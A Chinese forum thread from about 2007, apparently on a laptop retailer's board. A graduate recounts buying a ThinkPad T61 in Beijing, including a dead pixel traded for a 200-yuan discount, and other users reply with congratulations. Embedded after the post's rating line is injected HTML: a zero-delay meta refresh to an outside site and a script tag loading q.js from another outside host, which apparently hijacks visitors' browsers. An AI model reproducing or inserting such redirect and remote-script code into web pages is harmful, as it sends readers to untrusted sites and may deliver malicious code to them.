开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 补上一周前的购机手机(上PP啦啊)

刚刚毕业,工作需要整一个本本,其实这早是期待已久的了,只是经济能力有限,所以也只是观望,想想来翔意时间已经不短了,应该是去年十月份的事了,专业快一年了。
     其实从近年年初就有买本的打算但是当时有一个台式机用着知道家里肯定不同意买所以也是没事就看看图片和介绍流点口而已,但当时就已经想好,要买就买小黑T系,就像手机只买NOKIAN系一样,行的买不起,就买水的,价格实惠量又足啊,一直拖到毕业,终于离梦想越来越近了,自己几乎天天登XY,看看报价,了解一下行情,发表一下自己的建议和感慨,当然也灌了不少水,被老大警告了一次,改正了呵呵,其实也没有什么,说白了只不过是为了热闹热闹顺便再赚点xb等买机子时拍个价格优惠,后来想想大家都狂灌确实也不合适,老大的做法我还是比较理解的,有些坛子里的兄弟因为被扣了 XB,闷闷不乐的,有的甚至开贴抗议,大家心情其实我很理解,但是咱们也实要换位思考一下的啊呵呵,不然这里真的会成水吧的:)说实话当时并没有只关注XY还有几个论坛也在看,但是几圈下来感觉还是定在这里,原因很简单,就像葛优那个神州行广告似的,哪人多去哪。
   关注小黑,从T43T60,一直到现在的T61,关注机型一直都是基础款,一是因为没米,二是平时自己也就是上上网,聊聊天,游戏几乎不玩,开始关注60时还在犹豫x1300用在vista上购不够用,现在好了,发现61上市这款AK2价格比同样价格的60配置一点都不差,而且140M的显卡比1300还是好上不少的,至少vista没有问题了,这下可高兴不少,一开始总觉得60好,但就因为这个显卡配置,像其他的竖置usb口,款屏什么的重要性相比较起来都不是太重要,身边的朋友个个被我忽悠地都买小黑了,就剩我一个理论派了,这下可好了,梦想要成真了!
     Money终于到位了,周五朋友聚会,回来晚了,没有赶上拍卖,不想再等了,XB留着拍配件吧,一大早就睡不着了,起来先看报价,没有降价,不过也没涨(给自己找点安慰啊,涨的可能太小了)按照制定好的计划首先去了趟中关村去给同学的机器加硬盘,自己也狠狠心买了条1G的金士顿内存,后悔200多时没有提前出手,现在据说是因为iphone上市带动闪存的价格上扬,想想内存这东西还真跟股票似的啊,没办法,为了心爱的小黑能够跑得更流畅,出手吧
事情搞定后已经下午亦了,在海龙吃了点东西就准备朝xy进发了,先打了个电话过去,是一个MM接的,问xy在中关村怎么走,MM说很远,要坐车到五道口转城铁再转地铁,看来买个小黑还真的得跋山涉水,翻山越岭啊:)
XY已经快六点了,心想都快下班了,应该已经没有啥人了吧,可到了天晨的1204才发现自己真的是错了,里面几个玻璃桌都占满了,大家一个个都在仔细地检查着即将投入自己怀抱的小黑,一位姓任的先生让我们稍等,怕没货顺便问了一句,说AK2还有,就放下了心,蹭了点水喝,一路颠簸真的是渴坏了。
到快六点半的时候机器终于拿过来了,任先生很负责得给做着测试,说话很客气,也很亲切,感觉到这里的氛围镇的跟在坛子里感觉一样----火爆又亲切,一个小风波发生了,发现了一个暗点,且郁闷的是了解到这是最后一台了,再等下批货还不知道得到什么时候,那位先生表示我们有两个选择,一是看另外一款AK3,二是这台价格优惠200,这下可真是矛盾大了,心中小黑是完美的,不想它有一点瑕疵,可是AK3的价格远远高出了预算,后来跟同学商量了一下,发现这个点是在很偏左不显眼的一个位置,且不趴到屏幕跟前仔细看根本就找不到,兄弟们都劝说我这叫缺陷美,狠心咬牙跺脚就出手了!加内存贴膜走人,俩兄弟还一人蹭了条国标电源线J
回到住处,饭也没吃就开始摆弄盼望已久的小黑,虽然朋友4360都玩过不短时间,但还是真正属于自己的爽啊:0
就先写到这里吧,等有了新的使用心得在传上来,先发几个PP啊:)

+400---tszmsid
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 400

恭喜
有钱人!!
Nokia都是N系列的,是不是该换个N73了。。。。
楼主计算机专业的吧?
呵呵~~!还以为是购买手机呢!一般过去都是坐地铁这样快!记得XY好像在中关村有店啊!
牛啊,还附带半“裸照”!!!恭喜
N有那么好么?       不过宽屏确实不舒服
呵呵,跟我的一样。俺也是上周买的。
原帖由 nclf 于 2007-8-19 23:19 发表
牛啊,还附带半“裸照”!!!恭喜

就是啊!贴了膜变成镜面屏就是NB,呵呵。
那个宽屏,歪脸的是楼主的,嘿嘿
不错呀,恭喜!tttttt
LZ有米呀!羡慕ING。。。。。
买了就好,好好用吧。缺陷美~~~
呵呵,恭喜楼主,不知道屏贴了膜好吗?我感觉还是不贴的好,大家觉的呢
那几张照片太牛了,羡慕啊~~
到时候,我也贴个膜,这样BOSS在旁边我就能及时发现。
买笔记本肯定是要贴磨得 嘿嘿黑
舍弃中关村的确是明智之举~
唉,楼主啊,欣喜若狂也不能不雅吧!
有米人啊?

这么多好东西
abjrk 该用户已被删除
我的到现在还没有时间发上来。汗。
不错的手记!   

3个N系诺基亚+3本小黑真是绝配啊,都是超级大款。
呵呵  超级大款就不买水的了